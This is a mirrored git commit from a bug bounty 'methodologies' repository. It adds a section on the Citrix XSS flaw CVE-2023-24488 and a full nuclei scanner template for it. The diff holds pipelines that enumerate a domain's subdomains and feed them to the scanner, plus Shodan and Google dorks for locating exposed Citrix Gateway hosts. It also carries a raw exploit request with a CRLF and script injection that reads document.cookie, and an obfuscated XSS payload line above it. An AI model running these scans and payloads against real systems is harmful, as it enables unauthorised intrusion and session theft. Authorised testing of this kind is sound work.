mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-21 19:23:08 +00:00
GITBOOK-51: change request with no subject merged in GitBook
This commit is contained in:
parent
692f151b2b
commit
aedb40ca27
3 changed files with 61 additions and 0 deletions
15
README.md
15
README.md
|
@ -359,6 +359,21 @@ GET /?q=xss POST /q=xss
|
|||
<iMg src%3dN onerror%3dalert(0x000D98)>
|
||||
```
|
||||
|
||||
### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
|
||||
|
||||
**Command**:\
|
||||
subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
|
||||
\
|
||||
assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
|
||||
\
|
||||
**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
|
||||
\
|
||||
**Shodan Dork**:\
|
||||
ssl:[target.com](http://target.com/) title:"Citrix gateway"\
|
||||
\
|
||||
**Dork**:\
|
||||
intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
|
||||
|
||||
### Some awesome people on twitter
|
||||
|
||||
* [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
|
||||
|
|
|
@ -13,3 +13,4 @@
|
|||
* [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
|
||||
* [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
|
||||
* [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
|
||||
* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)
|
||||
|
|
45
xss-nuclei-template-cve-2023-24488.yaml.md
Normal file
45
xss-nuclei-template-cve-2023-24488.yaml.md
Normal file
|
@ -0,0 +1,45 @@
|
|||
# 🎯 XSS nuclei template CVE-2023-24488.yaml
|
||||
|
||||
```yaml
|
||||
id: CVE-2023-24488
|
||||
|
||||
info:
|
||||
name: CVE-2023-24488
|
||||
author: assetnote
|
||||
severity: medium
|
||||
description: description
|
||||
reference:
|
||||
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
|
||||
tags: tags
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: NSC_TASS=/Citrix
|
||||
Cache-Control: max-age=0
|
||||
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
|
||||
Sec-Ch-Ua-Mobile: ?0
|
||||
Sec-Ch-Ua-Platform: "Windows"
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
|
||||
Sec-Gpc: 1
|
||||
Accept-Language: en-GB,en
|
||||
Sec-Fetch-Site: none
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- <script>alert(document.cookie)</script>
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
```
|
Loading…
Reference in a new issue